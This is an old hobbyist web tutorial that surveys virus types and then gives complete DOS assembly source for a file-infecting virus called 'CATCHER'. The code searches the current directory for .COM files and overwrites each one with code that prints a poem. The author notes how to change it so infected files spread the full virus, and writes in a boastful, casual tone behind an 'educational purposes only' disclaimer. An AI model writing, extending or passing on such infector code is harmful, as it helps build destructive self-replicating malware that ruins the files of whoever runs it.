VIRUSES, A NEW DEFINITION
BROUGHT TO YOU BY PRABIN 
 
Author Prabin
Target Learn about Viruses
Public Release  March 5,2003
Author Contact [email protected]
Website http://www.geocities.com/prabinpebam
Difficulty Level (1-7) 1
Tools Required Hiew 6.x

Warning:  This document is for Educational purposes only.
You know playing with viruses can get you in trouble so don't be stupid, use at your own risk!
 
 
Introduction

    Hi, sorry for the inactivity.  I have been hearing about viruses quite often and I feel like making one of my own, so far I am able to code a virus that can search a whole directory and infect any type of files that's in it.
 
Tutorial

    First of all, there are lots different types of viruses.
    What the heck, I wanna make this tutorial longer so I put the brief descriptions:


    Program viruses:
    This is just basically a virus that infects .exe or .com files.  It appends or overwrites the executable
    with it's own virus code so that when executed, this file will start infecting other executable files.
    Stealth viruses:
    The name is kinda self-explainatory.  This type of virus tries to hide itself from virus scanners by
    hiding or changing directory sizes.
    Polymorphic viruses:
    Self-explainatory name also.  This kind uses special encryption methods to encrypt it's own
    virus codes and signature making it very difficult for virus scanners to detect.
    Boot viruses:
    When a computer boots up, it scans the floppy disk and hard disk boot sectors and if it detects
    executable code, it executes them.  When you install an Operating System such as Micro$oft
    Windows, the setup writes codes to the boot sector telling how the OS will start, in Window's
    case, the boot sector executes files such as IO.SYS.
    Macro viruses:
    Macro viruses can only be opened with Micro$oft Office (Office97 or higher).
    In Microsoft Office, there is an embedded macro function that let's you use "Visual Basic" code and
    event handlers to create macros.  Macro viruses are malicious VB codes, such as KILL filename and
    other codes that can do malicious activities.

    Most viruses, excluding Macro viruses, are coded in assembly (sometimes pascal).
    The reason is very simple, the author want as much speed as possible and smaller
    code.  A simple executable compiled in C++ to display the message "Hello world!" can
    take up to 2 kilobytes while assembly opcodes can display the same "Hello world!" string
    with a 20 byte .com file.  I will just keep it simple and start off with a simple file infecting
    virus.  Maybe next time when I feel like it, I will code a boot virus and write a tutorial on it.
    First here's the virus assembly codes, the name of the virus is "CATCHER".
 
        ;CATHCER.ASM
        .MODEL TINY          ; code and date are in same segment

        .CODE

        ORG 100H             ; start code at 100h

        START:

        STARTOVER:
        MOV AH, 4EH          ; function 4Eh of int 21h is FIND FIRST FILE
        LEA DX, FILESPEC     ; *.com files
        XOR CX, CX           ; CX = 0
        INT 21H              ; interrupt 21h
        JMP INFECTFILE       ; goto INFECTFILE

        FINDNEXTFILE:
        XOR AX, AX           ; ax = 0
        MOV AH, 4FH          ; function 4Fh of int 21 is FIND NEXT FILE
        INT 21H              ; intterupt 21h
        JC VIRALMSG          ; no more files found

        INFECTFILE:
        MOV DX, 09EH         ; filename is stored in the DTA
        MOV AH, 3DH          ; function 3Dh of int 21h is OPEN FILE
        MOV AL, 01H          ; access mode = write only
        INT 21H              ; interrupt 21h
        JC ERROR
        XCHG AX, BX          ; swap ax with bx

        MOV AH, 40H          ; function 40h of int 21h is WRITE FILE
        MOV CX, (OFFSET VIRIICODEND - OFFSET VIRIICODE)  ; number of bytes to write
        MOV DX, 140H         ; offset of data to write from
        INT 21H              ; interrupt 21h
        JC ERROR
        JMP FINDNEXTFILE     ; loop

        VIRALMSG:
        MOV AH, 09H          ; function 9h of int 21h is PRINT STRING TO STANDARD OUTPUT
        MOV DX, OFFSET VIRMSG ; string to display 
        INT 21H               ; intterupt 21h
        JMP FINISH

        ERROR:
        ;...
        FINISH:
        INT 20H               ; Fuck out

        FILESPEC DB "*.COM",00

        VIRIICODE:

        MOV AH, 09H    ; PRINT STRING
        MOV DX, 10DH   ; offset of VIRMSG in new files
        INT 21H
        XOR AH, AH     ; AH = 0, Wait for Keypress
        INT 16H        ; Interrupt 16h
        INT 20H        ; fuck out again !

        VIRMSG   DB "If a body meet a body",13,10
                 DB "Coming thru the rye",13,10
                 DB "If a body kiss a body",13,10
                 DB "Need a body cry",13,10
                 DB "Every lassie has her laddie",13,10
                 DB "Nane they say have I",13,10
                 DB "Yet all the lads they smile on me",13,10
                 DB "When coming thru the rye$"

        VIRIICODEND LABEL NEAR

        END START
 

    The virus starts, finds the first .com file in the current directory, infects the file with the virus
    code that displays the POEM and then loops and finds the next .com file and infects it too.
    It continusly loops until the Carry Flag is set, which either means an error occurred or no more
    files of that kind are found.  When you run the infected .com files, those .com files will not infect
    other .com files because CATCHER only wrote the codes to display the POEM.  You can change it
    so it infects the .com files with the whole virus code so the infected .com file will go on to infect
    other .com files when they are executed too.

    To get help on all the interrupts, get Ralf Browns Interrupt List!
    That's the best and most complete list of Interrupt functions available.
 
 
Final Thoughts

    This page is meant for ducational purpose only. Now that you have gone through this page, you must have learn a little more about viruses. Before playing with your viruses, consider the consequences.

For further informations write to [email protected]
Property of http://www.geocities.com/prabinpebam
 
 
The end.

Hosted by www.Geocities.ws

1